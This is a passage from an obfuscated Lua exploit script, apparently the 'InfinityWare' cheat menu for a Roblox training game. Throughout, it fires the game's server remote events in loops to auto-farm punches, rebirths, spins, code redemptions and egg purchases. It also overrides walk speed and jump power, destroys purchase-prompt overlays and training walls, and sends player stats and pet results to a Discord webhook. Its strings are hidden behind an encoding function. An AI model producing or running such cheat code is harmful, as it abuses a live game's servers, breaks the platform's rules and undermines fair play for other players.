]=getgenv().World,[2]=getgenv().PunchBags};game:GetService(v7("\64\177\6\23\10\11\89\102\177\18\40\23\7\74\115\179\19","\56\18\212\118\123\99\104")).Packages.Knit.Services.PunchBagService.RE.onGiveStats:FireServer(unpack(v291));v290=1 + 0 ;end if (v290==1) then wait();task.wait();break;end end end end);end);spawn(function() Toggles.AutoRebirth:OnChanged(function() while getgenv().AutoRebirth and task.wait()  do local v292=0;local v293;while true do if (v292==(585 -(217 + 368))) then v293=0 -0 ;while true do if (v293==0) then game:GetService(v7("\44\236\232\223\214\221\31\253\253\215\236\202\17\251\249\212\218","\190\126\137\152\179\191")).Packages.Knit.Services.RebirthService.RE.onRebirthRequest:FireServer();task.wait();break;end end break;end end end end);end);v76=2 + 0 ;end if (v76==2) then spawn(function() Toggles.AutoSuperRebirth:OnChanged(function() while getgenv().AutoSuperRebirth and task.wait()  do local v294=0 + 0 ;while true do if (v294==(0 + 0)) then game:GetService(v7("\26\7\98\199\163\67\41\22\119\207\153\84\39\16\115\204\175","\32\72\98\18\171\202")).Packages.Knit.Services.RebirthService.RE.onSuperRebirth:FireServer();task.wait();break;end end end end);end);spawn(function() Toggles.AutoClick:OnChanged(function() while getgenv().AutoClick and task.wait()  do v21();task.wait();end end);end);v76=892 -(844 + 45) ;end if (v76==(287 -(242 + 42))) then local v202=0 -0 ;while true do if (v202==(0 -0)) then spawn(function() Toggles.AutoSpin:OnChanged(function() while getgenv().AutoSpin and task.wait(10)  do local v348=1200 -(132 + 1068) ;local v349;while true do if (v348==(0 -0)) then v349=0;while true do if (v349==0) then game:GetService(v7("\54\141\34\120\254\7\137\38\113\243\55\156\61\102\246\3\141","\151\100\232\82\20")).Packages.Knit.Services.SpinService.RE.onSpinRequest:FireServer(false);task.wait();break;end end break;end end end end);end);spawn(function() Toggles.AutoRedeem:OnChanged(function() while getgenv().AutoRedeem and task.wait()  do local v350=1623 -(214 + 1409) ;local v351;while true do if (v350==(0 + 0)) then v351={[1635 -(497 + 1137) ]=v7("\113\214\249\10\108","\104\31\185\150"),v7("\206\188\255\242\230\223\229","\160\188\217\147\151\135\172\128"),v7("\14\197\21\252","\169\111\189\112\144\90"),v7("\221\138\43\166\172\129\7\134\206\130\54\185\179\133","\226\173\227\69\205\223\224\105"),v7("\10\110\114\86","\123\56\94\66\59\175"),v7("\255\77\112\233\27\240\149","\225\154\35\19\129\122\158"),v7("\110\18\234\83\252\233\215","\84\58\96\139\55\149\135\176"),v7("\63\58\162\7\91\202\45","\94\115\95\195\96\46\175"),v7("\80\78\60\47\43\57","\128\35\43\95\93\78\77\231"),v7("\163\8\58\56\30\124\165\161","\201\196\125\86\84\119\30"),v7("\232\224\13\184\203\250\29","\223\163\142\100")};game:GetService(v7("\176\19\211\189\177\129\23\215\180\188\177\2\204\163\185\133\19","\216\226\118\163\209")).Packages.Knit.Services.CodeRedemptionService.RE.onRedeem:FireServer(unpack(v351));v350=1 + 0 ;end if (v350==1) then task.wait();break;end end end end);end);v202=1;end if (v202==(477 -(296 + 180))) then v76=1407 -(1183 + 220) ;break;end end end if (v76==(1269 -(1037 + 228))) then spawn(function() Toggles.AutoArmWrestle:OnChanged(function() while getgenv().AutoAW and task.wait()  do local v295=0 -0 ;while true do if (v295==(0 -0)) then v59();task.wait();break;end end end end);end);v12=54 -38 ;break;end if (v76==(734 -(527 + 207))) then v56:AddSlider(v7("\169\203\49\8\179\209\43\29\145","\120\227\190\92"),{[v7("\9\89\7\111","\130\93\60\127\27\67\60\185")]=v7("\98\39\53\94\208\76\106\77\32","\29\40\82\88\46\128\35"),[v7("\31\64\210\28\20\180\47","\216\91\37\180\125\97")]=547 -(187 + 340) ,[v7("\8\127\18","\55\69\22\124\163")]=16,[v7("\85\210\68","\148\24\179\60\136\191\17\48")]=2070 -(1298 + 572) ,[v7("\128\37\236\174\242\187\36\254","\150\210\74\153\192")]=2 -1 ,[v7("\208\221\62\140\124\98","\212\131\168\88\234\21\26")]=v7("\5\100\134\155\61\53\11","\71\37\20\233\236\88"),[v7("\238\73\189\6\65\239\88","\60\173\38\208\118\32\140\44")]=false,[v7("\98\51\237\223\34\206\66\57","\175\33\82\129\179\64")]=function(v251) while wait() do game.Players.LocalPlayer.Character.Humanoid.JumpPower=v251;end print(v7("\213\198\7\143\15\167\254\255\63\221\40\183\252\210\112\252\57\190\235\236\36\202\56\242\180","\210\142\143\80\175\92"),v251);end});v53:AddToggle(v7("\152\252\231\201\141\251\242\207\183\194\253\211\186\226\255\195\170","\166\217\137\147"),{[v7("\215\166\106\178","\38\131\195\18\198\145")]=v7("\114\195\46\228\120\96\65\215\51\229\120\127\93\195\57\224\52\81\64","\52\51\182\90\139\88"),[v7("\210\188\214\230\86\250\173","\35\150\217\176\135")]=false,[v7("\205\95\4\0\99\74\102","\22\153\48\107\108\23\35")]=v7("\43\139\186\24\115\112\1\200\27\145\180\90\75\103\64\224\0\197","\137\110\229\219\122\31\21\33"),[v7("\57\188\52\119\52\74\39\117","\30\122\221\88\27\86\43\68")]=function(v252) local v253=170 -(144 + 26) ;while true do if (v253==(0 -0)) then getgenv().AutoKnuckles=v252;warn(v7("\3\1\220\198\11\61\251\150\55\58\255\131\42\21\171\181\61\36\238\133\44\45\239\198\98","\230\88\72\139"),v252);break;end end end});v76=2 -1 ;end end end if (v12==(7 + 12)) then v29:SetLibrary(v28);v30:SetLibrary(v28);v29:ApplyToTab(v32["UI Settings"]);v29:ApplyTheme(v7("\9\124\185\85\210\50","\64\67\25\202\33\183"));v30:LoadAutoloadConfig();v30:SetIgnoreIndexes({v7("\196\235\127\169\5\215\90\235\231\127\184","\35\137\142\17\220\78\178")});v29:SetFolder(v7("\1\71\43\14\63\71\36\45\36\76\22\4\57\90\44\15\42\93","\97\77\46\69"));v30:SetFolder("InfinityWare/specific-game");break;end if (v12==(41 -23)) then spawn(function() Toggles.PetWebhook:OnChanged(function() local v174=0;while true do if (v174==(4 -3)) then function GetPet() local v296=game:GetService(v7("\74\11\212\205\251\189\125\108\11\192\242\230\177\110\121\9\193","\28\24\110\164\161\146\222")).Packages.Knit.Services.EggService.RF.purchaseEgg:InvokeServer(getgenv().EggSelect,{});if (v296~=nil) then for v352,v353 in pairs(v296) do if ((v353~=nil) or (v352~=nil)) then local v379=0;while true do if (v379==(0 + 0)) then getgenv().GettedPet=v353;if ((getgenv().Url~="") and (getgenv().PetWebhook==true)) then local v392=0;local v393;while true do if (v392==(0 -0)) then v393=require(game:GetService(v7("\105\198\70\41\82\192\87\49\94\199\101\49\84\209\87\34\94","\69\59\163\54")).Data.PetData);print(v7("\153\165\203\77\54","\214\208\200\170\42\83\173"),v393[v353][v7("\240\44\115\167\112\202","\21\185\65\18\192")][v7("\208\89\79\22\160\242","\193\158\54\61\123")]);v392=1 + 0 ;end if (v392==(1 + 0)) then local v394=0;while true do if (v394==(202 -(5 + 197))) then print(v7("\24\4\44\173\60\1\44\176\48\3","\217\85\113\64"),v393[v353].Multiplier);print(v7("\121\14\222\201\251\155","\133\43\111\172\160\143\226"),v393[v353].Rarity);v394=1;end if (v394==(687 -(339 + 347))) then v392=2;break;end end end if (v392==(4 -2)) then print(v7("\239\170\67\193\204\202\186\29\255\193\198\166","\160\171\195\48\177"),v393[v353].DisplayName);LWebHook(v393[v353].DisplayName,v393[v353].Rarity,v393[v353][v7("\250\14\119\42\89\210","\167\179\99\22\77\60\161\207")][v7("\47\112\153\85\77\13","\44\97\31\235\56")],v393[v353].Multiplier);break;end end end break;end end end end end end spawn(function() Toggles.PetWebhook:OnChanged(function() while getgenv().PetWebhook and wait(getgenv().PetTime)  do local v340=0;while true do if (v340==0) then GetPet();wait();break;end end end end);end);break;end if (v174==0) then wait(getgenv().PetTime);function LWebHook(v297,v298,v299,v300) local v301=v299;local v302=v301:gsub("rbxthumb://type=Asset&id=","");local v303=v302:gsub(" ","");local v304=v303;local v305=game:HttpGet("https://thumbnails.roblox.com/v1/assets?assetIds="   .. v304   .. v7("\82\94\123\95\17\16\39\20\70\85\39\20\70\11\116\74\6\64\115\81\73\125\124\66\82\68\97\102\29\95\113\80\24\76\96\24\18\76\126\86\17","\37\116\45\18") );Thing=game:GetService(v7("\231\235\66\178\152\202\237\64\171\168\202","\203\175\159\54\194")):JSONDecode(v305).data[1];local v307=Thing.imageUrl;wait(getgenv().PetTime);local v308={[v7("\111\199\13\55\95","\162\27\174\121\91\58\47")]=v7("\242\242\44\181\35\153\227\192\11\230\23\214\220\206","\185\179\165\127\149\95"),[v7("\82\122\195\251\5","\119\49\21\175\148")]=9965450 -7135833 ,[v7("\86\160\2\85\34\91","\149\55\213\118\61\77\41\234")]={[v7("\19\7\199\195","\123\125\102\170\166\137\89\207")]=game.JobId,[v7("\91\18\84","\201\46\96\56\93\110\227")]=v307},[v7("\189\12\225\237\16\211","\161\219\99\142\153\117")]={[v7("\104\180\190\103","\173\28\209\198\19")]="dsc.gg/ireborn"},[v7("\97\228\162\182\119\226\182\178\121","\219\21\140\215")]={[v7("\93\170\202","\56\40\216\166\199")]=v307},[v7("\32\189\16\35\34\167","\79\70\212\117")]={{[v7("\169\23\236\195","\109\199\118\129\166\153")]=v7("\123\250\95\247\37\179\127\243\53\240\71\243\37\234\61\188","\150\81\208\23"),[v7("\239\196\236\158\252","\235\153\165\128")]=v297,[v7("\178\71\174\38\72\35","\158\219\41\194\79\38\70\202")]=false},{[v7("\77\36\34\7","\232\35\69\79\98\142\182")]=v7("\51\74\45\252\107\9\11\228\35\74\85","\157\25\96\127"),[v7("\177\130\249\16\85","\81\199\227\149\101\48")]=v298,[v7("\116\92\247\24\248\131","\219\29\50\155\113\150\230\92")]=true},{[v7("\223\33\200\126","\45\177\64\165\27\159\40")]=v7("\87\92\34\191\126\9\31\31\166\123\24\4\85\224\56","\18\125\118\111\202"),[v7("\70\61\85\239\53","\155\48\92\57\154\80\205\167")]=v300,[v7("\176\195\183\182\246\174","\37\217\173\219\223\152\203")]=true},{[v7("\7\4\18\51","\150\105\101\127\86\47\200")]=v7("\132\184\214\178\192\154\132\184","\160\174\146\147\213\167"),[v7("\86\229\22\81\9","\33\32\132\122\36\108")]=getgenv().EggSelect,[v7("\176\26\126\66\114\188","\28\217\116\18\43")]=true}},[v7("\198\94\219\81\195\186\61\223\71","\92\178\55\182\52\176\206")]=os.date(v7("\95\12\60\80\23\120\52\17\46\112\73\91\74\101\33\47","\117\122\85\17"))};((syn and syn.request) or http_request)({[v7("\189\253\38","\189\232\143\74\36\198")]=getgenv().PetUrl,[v7("\209\175\30\70\216\14","\106\156\202\106\46\183")]=v7("\13\54\72\7","\74\93\121\27\83"),[v7("\85\190\231\122\120\169\245","\30\29\219\134")]={[v7("\118\168\23\238\241\81\12\67\97\190\9\255","\110\53\199\121\154\148\63\120")]="application/json"},[v7("\35\21\251\38","\156\97\122\159\95\57")]=game:GetService(v7("\230\162\206\232\56\7\45\216\191\217\253","\95\174\214\186\152\107\98")):JSONEncode({[v7("\140\3\115\142\23\213","\166\233\110\17\235\115")]={v308}})});end v174=925 -(837 + 87) ;end end end);end);v66={};spawn(function() Toggles.Webhook:OnChanged(function() while getgenv().Webhook and task.wait(getgenv().Time)  do local v203={"K","M","B","T",v7("\192\15","\196\145\110\152"),v7("\105\39","\146\56\78\158"),v7("\30\195","\58\77\187\47\134"),v7("\33\37","\126\114\85\193\103\133\78\52"),v7("\235\216","\24\164\187\82"),v7("\223\213\82","\145\145\186\60\202")};local function v204(v254) local v255=0;local v256;local v257;while true do if (v255==(234 -(7 + 227))) then local v327=0 -0 ;while true do if (1==v327) then v255=167 -(90 + 76) ;break;end if (v327==0) then if  not tonumber(v254) then return v254;end if (v254<(31376 -21376)) then return math.floor(v254);end v327=1;end end end if (v255==(1 + 0)) then local v328=0 + 0 ;while true do if ((0 + 0)==v328) then v256=math.floor(math.log10(v254)/(11 -8) ) * (263 -(197 + 63)) ;v257=tostring(v254/(10^v256) ):sub(1 + 0 ,2 + 3 );v328=1 + 0 ;end if (v328==(1 + 0)) then v255=2;break;end end end if (v255==(2 -0)) then return v257   .. " "   .. tostring(v203[math.floor(v256/(1372 -(618 + 751)) )]) ;end end end end end);end);spawn(function() Toggles.PetWebhook:OnChanged(function() local v175=0 + 0 ;while true do if (1==v175) then while getgenv().Webhook do local v309=0;while true do if (v309==(1910 -(206 + 1704))) then GetStats();wait();break;end end end break;end if (v175==0) then local v279=0 -0 ;while true do if (v279==1) then v175=1 -0 ;break;end if ((0 + 0)==v279) then function MWebHook(v354,v355,v356,v357,v358,v359,v360) local v361=0;local v362;local v363;local v364;local v365;while true do if (v361==2) then v19=(syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or v19 or HttpPost ;v365={[v7("\209\15\164","\112\132\125\200")]=getgenv().Url,[v7("\223\183\247\106","\149\157\216\147\19\58")]=v363,[v7("\228\131\12\192\198\130","\168\169\230\120")]=v7("\204\162\183\35","\119\156\237\228"),[v7("\235\212\1\122\198\195\19","\30\163\177\96")]=v364};v361=3;end if (v361==(1276 -(155 + 1120))) then v363=game:GetService(v7("\108\194\76\99\159\65\196\78\122\175\65","\204\36\182\56\19")):JSONEncode(v362);v364={[v7("\234\68\210\151\120\54\6\164\95\197\147\120","\114\137\43\188\227\29\88")]="application/json"};v361=1508 -(396 + 1110) ;end if (v361==(6 -3)) then v19(v365);break;end if (v361==0) then local v388=0;while true do if (v388==0) then wait(getgenv().Time);v362={[v7("\229\223\61\16\227\222\39","\100\134\176\83")]=nil,[v7("\214\204\64\184\183\6","\117\179\161\34\221\211")]={{[v7("\78\191\246\201\22","\197\45\208\154\166\100\159")]=2132547 + 697070 ,[v7("\47\253\131\176\55\58","\83\73\148\230\220")]={{[v7("\61\222\251\229","\233\83\191\150\128\143")]=v7("\204\218\149\117\4\241\146\220\40\92\166\210\153\37\90\160\208\150\37\89\166\211\159\37\85\167\211\150\44\48\183\178\192\102\12\251\182\192\101\8\229","\109\151\230\175\18"),[v7("\182\251\77\81\133","\224\192\154\33\36")]=v25(v354),[v7("\138\90\20\139\141\81","\226\227\52\120")]=true},{[v7("\11\234\225\161","\217\101\139\140\196\42\223\183")]=v7("\33\83\245\40\65\24\6\189\14\76\64\94\254\78\18\77\88\250\66\21\72\87\252\78\18\75\94\253\72\20\68\50\239\40\65\24\6\189\14\76\9","\36\122\111\207\122"),[v7("\26\9\232\173\189","\84\108\104\132\216\216")]=v25(v355),[v7("\197\21\202\81\238\161","\34\172\123\166\56\128\196")]=true},{[v7("\170\168\165\206","\116\196\201\200\171\42\19\181")]=v7("\77\218\161\106\26\18\16\114\164\244\82\6\20\70\39\215\175\11\66\87\72\46\223\171\15\69\80\69\32\223\169\14\66\94\33\54\188\244\83\16\64\49\99\138\239\84\5\12\21\115\148","\124\22\230\155\61\117\96"),[v7("\211\170\234\254\251","\149\165\203\134\139\158\141")]=v356,[v7("\58\162\76\47\61\169","\70\83\204\32")]=true},{[v7("\0\128\6\133","\224\110\225\107")]=v7("\207\42\135\26\62\209\199\255\122\216\34\106\149\149\160\32\138\102\99\149\145\166\46\137\101\103\145\148\173\34\133\111\13\132\239\250\99\222\58\60\193\132\199\98\207\52\62\195\208\252","\164\148\22\189\81\80\164"),[v7("\164\129\123\166\34","\23\210\224\23\211\71\43")]=v25(v357),[v7("\160\136\28\190\91\46","\144\201\230\112\215\53\75\188")]=true},{[v7("\91\196\20\239","\197\53\165\121\138\150")]=v7("\214\131\131\39\255\214\201\51\183\142\136\116\187\136\142\114\187\134\137\112\181\136\136\121\185\137\129\116\179\226\153\8\236\209\221\96\222\203\203\37\227\216\205\40","\64\141\191\185"),[v7("\21\235\188\207\242","\198\99\138\208\186\151\169")]=v25(v358),[v7("\4\251\143\87\3\240","\62\109\149\227")]=true},{[v7("\253\137\132\209","\96\147\232\233\180")]=v7("\19\100\64\105\132\58\45\40\9\17\220\104\124\110\77\28\222\104\112\109\77\28\221\105\122\97\74\19\219\103\21\120\56\66\142\60\56\120\10\68\154\60\58","\89\72\88\122\43\237"),[v7("\58\186\169\35\30","\123\76\219\197\86")]=v25(v359),[v7("\81\214\25\5\224\58","\95\56\184\117\108\142")]=true},{[v7("\254\195\43\233","\140\144\162\70")]=v7("\235\116\3\69\231\222\59\3\35\191\132\126\14\37\189\130\121\1\39\183\128\124\14\42\186\133\127\7\79\174\231\33\87\97","\142\176\72\57\18"),[v7("\176\48\28\49\163","\68\198\81\112")]=v25(v360),[v7("\190\1\188\29\66\24","\125\215\111\208\116\44")]=false}},[v7("\19\79\90\254\122\82\6\78\67","\60\103\39\47\147\24")]={[v7("\249\24\251","\46\140\106\151\224\182\147")]=""},[v7("\234\56\105\74\228\63","\34\139\77\29")]={[v7("\190\241\16\81","\73\208\144\125\52")]=tostring(game:GetService(v7("\26\224\139\210\194\2\64","\171\74\140\234\171\167\112\51")).LocalPlayer.DisplayName   .. v7("\111\18\12\86\245\238","\205\79\110\44\63\145")   .. game.Players.LocalPlayer.UserId ),[v7("\178\77\51","\124\199\63\95\168\212\107\196")]="https://www.roblox.com/users/"   .. game.Players.LocalPlayer.UserId   .. "/profile" ,[v7("\15\171\92\52\155\226\155\255","\147\102\200\51\90\196\151\233")]=""},[v7("\61\255\224\217\187\242","\91\91\144\143\173\222\128")]={[v7("\55\165\84\69","\46\67\192\44\49\203")]="InfinityWare | dsc.gg/ireborn",[v7("\13\213\33\172\27\177\23\8","\101\100\182\78\194\68\196")]="https://cdn.discordapp.com/attachments/1015258948472934460/1045354177796255845/1.1_cool-removebg.png"},[v7("\92\65\61\240\158\95\121\216\88","\181\40\40\80\149\237\43\24")]=v7("\71\226\119\97\247\26\74\88\225\117\6\232\27\72\65\231\127\98\234\4\66\69\226\31","\114\117\210\69\82\218\42")}}};v388=1;end if ((602 -(473 + 128))==v388) then v361=49 -(39 + 9) ;break;end end end end end function GetStats() if ((getgenv().Url~="") and (getgenv().Webhook==true)) then local v380=0;local v381;local v382;local v383;local v384;local v385;local v386;local v387;while true do if (v380==(270 -(38 + 228))) then v387=lp:GetAttribute(v7("\105\210\2\214","\203\62\187\108\165"));MWebHook(v381,v382,v383,v384,v385,v386,v387);break;end if (v380==(1 -0)) then v381=lp:GetAttribute(v7("\46\47\65\136\49\24\192\8\37\91\142\41\35","\180\122\64\53\233\93\75"));v382=lp:GetAttribute(v7("\228\18\17\52\196\3\27\46","\93\182\119\115"));v380=475 -(106 + 367) ;end if (v380==0) then lp=game.Players.LocalPlayer;a=lp:GetAttributes();v380=1 + 0 ;end if (v380==(1865 -(354 + 1508))) then v385=lp:GetAttribute(v7("\17\33\62\18\148\27\43\37\62\17\179\7","\111\89\64\80\118\199"));v386=lp:GetAttribute(v7("\157\190\13\67\175\135\1\81\186\165","\38\223\215\110"));v380=12 -8 ;end if (v380==(2 + 0)) then v383=lp:GetAttribute(v7("\184\16\221\137\154\235\142\11\218\156\187\247\135\13","\158\226\127\179\236\215"));v384=lp:GetAttribute(v7("\218\206\220\213\250\204\204\229\229\210\204\216\246\212\193","\182\145\160\169"));v380=2 + 1 ;end end end end v279=1 -0 ;end end end end end);end);v65={};v67=v32[v7("\204\93\8\13\116\234\196\240\122\79\45","\176\153\20\40\94\17\158")]:AddLeftGroupbox(v7("\133\54\181\70","\165\200\83\219\51"));v67:AddButton(v7("\242\228\120\116\208\177","\132\167\138\20\27\177\213\220"),function() v28:Unload();end);v67:AddLabel(v7("\223\208\237\89\124\240\220\237\72","\92\146\181\131\44")):AddKeyPicker(v7("\102\251\79\147\149\69\14\223\66\240\69","\189\43\158\33\230\222\32\119"),{[v7("\122\197\75\80\157\82\212","\232\62\160\45\49")]=v7("\81\221\241","\193\20\179\149\204"),[v7("\249\14\180\235","\162\183\97\225")]=true,[v7("\29\192\252\227","\193\73\165\132\151\124\130")]=v7("\224\199\167\78\246\189\200\219\171\82\184\178","\214\173\162\201\59\214")});v28.ToggleKeybind=Options.MenuKeybind;v12=1263 -(334 + 910) ;end if (v12==14) then v53:AddToggle(v7("\27\190\45\117\155\13\59\162\55\88\166\28\63\187\42","\127\90\203\89\26\207"),{[v7("\233\48\183\223","\157\189\85\207\171\105")]=v7("\231\180\204\186\67\242\179\217\188\13\134\131\209\182\6\214\178","\99\166\193\184\213"),[v7("\242\178\134\186\25\134\194","\234\182\215\224\219\108")]=false,[v7("\244\142\180\57\212\136\171","\85\160\225\219")]=v7("\121\11\130\203\58\217\11\125\16\151\198\118\232\89\93\12\141\137","\43\60\101\227\169\86\188"),[v7("\83\201\221\179\88\205\186\60","\87\16\168\177\223\58\172\217")]=function(v143) getgenv().AutoTrainBiceps=v143;warn(v7("\15\228\110\157\8\33\221\73\210\41\32\200\75\224\123\7\200\85\216\56\32\200\93\157\97","\91\84\173\57\189"),v143);end});v56:AddToggle(v7("\49\172\24\243\135\223\22\173\31","\182\112\217\108\156\192"),{[v7("\158\13\80\251","\235\202\104\40\143")]=v7("\44\158\15\182\77\172\18\191\25\152","\217\109\235\123"),[v7("\3\140\120\87\101\220\217","\221\71\233\30\54\16\176\173")]=false,[v7("\0\243\81\179\32\245\78","\223\84\156\62")]=v7("\243\242\227\223\187\62\150\221\247\201\184\123\241\245\228\201\164\123","\91\182\156\130\189\215"),[v7("\93\114\160\89\124\114\175\94","\53\30\19\204")]=function(v145) local v146=895 -(92 + 803) ;while true do if (v146==0) then getgenv().AutoGifts=v145;warn(v7("\194\201\71\196\148\236\240\96\139\181\237\229\98\185\231\202\229\124\129\164\237\229\116\196\253","\199\153\128\16\228"),v145);break;end end end});v56:AddToggle(v7("\240\63\241\22\148\193\35\235","\199\177\74\133\121"),{[v7("\140\204\164\234","\74\216\169\220\158\87\166")]=v7("\201\54\7\35\26\219\51\26\34","\58\136\67\115\76"),[v7("\213\175\222\88\144\44\191","\61\145\202\184\57\229\64\203")]=false,[v7("\104\93\134\75\72\91\153","\39\60\50\233")]=v7("\63\61\162\46\142\45\242\130\15\39\172\108\177\56\187\173\90","\195\122\83\195\76\226\72\210"),[v7("\199\213\55\242\35\229\215\48","\65\132\180\91\158")]=function(v147) getgenv().AutoSpin=v147;warn(v7("\62\85\230\110\54\105\193\62\10\110\197\43\23\65\145\29\0\112\212\45\17\121\213\110\95","\78\101\28\177"),v147);end});v56:AddToggle(v7("\4\161\244\94\23\177\228\84\32\185","\49\69\212\128"),{[v7("\35\9\200\230","\129\119\108\176\146")]=v7("\29\218\19\194\101\60\25\56\202\2\192\101\45\19\56\202\20","\124\92\175\103\173\69\110"),[v7("\229\61\5\54\212\52\23","\87\161\88\99")]=false,[v7("\38\246\224\192\163\217\51","\67\114\153\143\172\215\176")]=v7("\155\172\239\12\178\167\174\47\171\182\225\78\153\171\232\26\173\226","\110\222\194\142"),[v7("\52\216\23\165\80\160\20\210","\193\119\185\123\201\50")]=function(v149) getgenv().AutoRedeem=v149;warn(v7("\76\33\206\102\60\108\15\103\7\235\50\10\107\34\55\59\252\42\10\122\11\114\12\185\124","\127\23\104\153\70\111\25"),v149);end});v56:AddToggle(v7("\40\18\178\160\15\45\190\191\16","\211\105\103\198\207\75\76\215"),{[v7("\250\162\168\251","\214\174\199\208\143\30\108\218")]=v7("\48\145\31\165\229\114\217\64\29\157\75\152\160\65\217\91\21\151","\41\113\228\107\202\197\54\184"),[v7("\94\136\62\93\111\129\44","\60\26\237\88")]=false,[v7("\236\37\123\234\186\209\58","\206\184\74\20\134")]=v7("\29\234\239\179\255\79\120\237\45\240\225\241\215\75\49\192\33\164\220\180\228\75\42\200\43\164","\172\88\132\142\209\147\42\88"),[v7("\164\139\192\1\52\244\189\140","\222\231\234\172\109\86\149")]=function(v151) local v152=0;while true do if ((0 + 0)==v152) then getgenv().Rewards=v151;warn(v7("\214\198\247\88\222\250\208\8\226\253\212\29\255\210\128\43\232\227\197\27\249\234\196\88\183","\120\141\143\160"),v151);break;end end end});v62=v56:AddButton(v7("\114\169\187\93\86\169\246\117\73\170\162\18\97\160\179\64\84","\50\32\204\214"),function() game:GetService(v7("\182\75\52\96\182\3\149","\113\230\39\85\25\211")).LocalPlayer.PlayerGui.GameUI.Menus.Gifts.RoutePromptOverlay:Destroy();end);v63=v56:AddButton(v7("\236\190\11\231\49\206\235\120\206\178\8\168\6\199\174\89\202","\43\190\219\102\136\71\171\203"),function() game:GetService(v7("\18\114\49\64\39\108\35","\57\66\30\80")).LocalPlayer.PlayerGui.GameUI.Menus.Spin.RoutePromptOverlay:Destroy();end);v64=v56:AddButton(v7("\27\221\173\26\146\60\180\179\40\212\172\6\196\2\195\139\59\212\164\85\209\4","\228\73\184\192\117\228\89\148"),function() local v153=game:GetService(v7("\248\134\103\31\220\153\116\23\202","\116\175\233\21")).Zones["5"].Interactables.Training.Walls:GetChildren();for v176,v177 in pairs(v153) do if string.match(v177.Name,v7("\202\241\187\84","\95\158\152\222\38\187\81")) then for v280,v281 in pairs(v177.Wall:GetChildren()) do if (v281.Name~="1") then v281:Destroy();end end end end end);v56:AddSlider(v7("\207\188\57\185\144\216\253\184\49","\168\152\221\85\210\195"),{[v7("\159\219\237\147","\231\203\190\149")]=v7("\253\49\226\232\185\231\91\254\45\230\244\184","\123\173\93\131\145\220\149"),[v7("\50\193\235\32\97\245\2","\153\118\164\141\65\20")]=1197 -(1035 + 146) ,[v7("\195\59\136","\96\142\82\230\130\151")]=632 -(230 + 386) ,[v7("\98\177\87","\142\47\208\47\34\132")]=349 + 251 ,[v7("\196\177\17\12\95\85\248\185","\60\150\222\100\98\59")]=1511 -(353 + 1157) ,[v7("\118\41\81\80\210\162","\81\37\92\55\54\187\218")]=v7("\64\87\189\50\132\4\10","\225\96\36\205\87"),[v7("\202\169\79\105\125\76\29","\105\137\198\34\25\28\47")]=false,[v7("\50\168\77\122\194\16\170\74","\160\113\201\33\22")]=function(v154) while task.wait() do game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v154;end print(v7("\239\113\155\231\154\184\196\72\163\181\189\168\198\101\236\148\172\161\209\91\184\162\173\237\142","\205\180\56\204\199\201"),v154);end});v12=15;end if (v12==(1125 -(53 + 1061))) then v57:AddToggle(v7("\161\89\162\16\249\142\95\162\12\232","\139\231\44\214\101"),{[v7("\237\234\30\74","\118\185\143\102\62\112\209\81")]=v7("\103\34\20\166\145\16\16\61\76\127\59\242\229\1\19\120\103\86\60\242\176\7\21\43\72\121\42\219","\88\60\16\73\134\197\117\124"),[v7("\116\239\254\201\84\92\254","\33\48\138\152\168")]=false,[v7("\70\25\63\93\213\62\98","\87\18\118\80\49\161")]=v7("\120\27\214\165\160\67\12\206","\208\44\126\186\192"),[v7("\212\27\168\202\22\253\202\69","\46\151\122\196\166\116\156\169")]=function() TeleportToFuturistic();warn(v7("\222\196\113\90\200\240\253\86\21\233\241\232\84\39\187\214\232\74\31\248\241\232\66\90\161","\155\133\141\38\122"),Value);end});v57:AddToggle(v7("\7\47\173\66\71","\197\69\74\204\33\47\31"),{[v7("\196\74\66\147","\231\144\47\58")]=v7("\137\139\231\53\44\56\195\60\162\215\200\97\88\41\192\121\137\250\223\116\27\53\242","\89\210\184\186\21\120\93\175"),[v7("\149\86\122\212\108\54\165","\90\209\51\28\181\25")]=false,[v7("\228\116\88\226\171\217\107","\223\176\27\55\142")]=v7("\16\190\194\176\52\180\220\161","\213\68\219\174"),[v7("\40\225\47\235\40\196\60\116","\31\107\128\67\135\74\165\95")]=function() local v155=0;local v156;while true do if (v155==(1635 -(1568 + 67))) then v156=0;while true do if (v156==(0 + 0)) then TeleportToBeach();warn(v7("\227\193\203\13\114\164\200\248\243\95\85\180\202\213\188\126\68\189\221\235\232\72\69\241\130","\209\184\136\156\45\33"),Value);break;end end break;end end end});v57:AddToggle(v7("\41\221\118\4\189\6\218\87\29\182\12\205","\216\103\168\21\104"),{[v7("\76\168\91\176","\196\24\205\35")]=v7("\21\223\222\70\26\142\239\3\62\132\241\18\110\159\236\70\21\165\246\5\34\142\226\20\19","\102\78\235\131"),[v7("\222\43\50\69\82\53\163","\84\154\78\84\36\39\89\215")]=false,[v7("\201\238\89\84\17\244\241","\101\157\129\54\56")]=v7("\41\172\134\174\51\118\15\189\202","\25\125\201\234\203\67"),[v7("\90\245\20\15\22\38\16\114","\115\25\148\120\99\116\71")]=function() local v157=0 + 0 ;while true do if (v157==(0 -0)) then TeleportToNuclearBunker();warn(v7("\55\20\142\100\114\25\45\169\43\83\24\56\171\25\1\63\56\181\33\66\24\56\189\100\27","\33\108\93\217\68"),Value);break;end end end});v57:AddToggle(v7("\245\94\162\161\222\74\179\143\206\69\170\168","\205\187\43\193"),{[v7("\202\119\29\203","\191\158\18\101")]=v7("\254\150\186\247\155\192\207\130\167\160\215\215\199\163\160\133\248\163\190\161\202\131\176\184\189\201\199\186","\207\165\163\231\215"),[v7("\226\252\255\87\49\124\210","\16\166\153\153\54\68")]=false,[v7("\230\188\207\74\32\40\233","\153\178\211\160\38\84\65")]=v7("\182\14\86\46\146\4\72\63\194","\75\226\107\58"),[v7("\123\223\29\118\19\195\206\83","\173\56\190\113\26\113\162")]=function() local v158=0 -0 ;while true do if (v158==(0 -0)) then TeleportToDinoWorld();warn(v7("\240\247\26\69\196\222\206\61\10\229\223\219\63\56\183\248\219\33\0\244\223\219\41\69\173","\151\171\190\77\101"),Value);break;end end 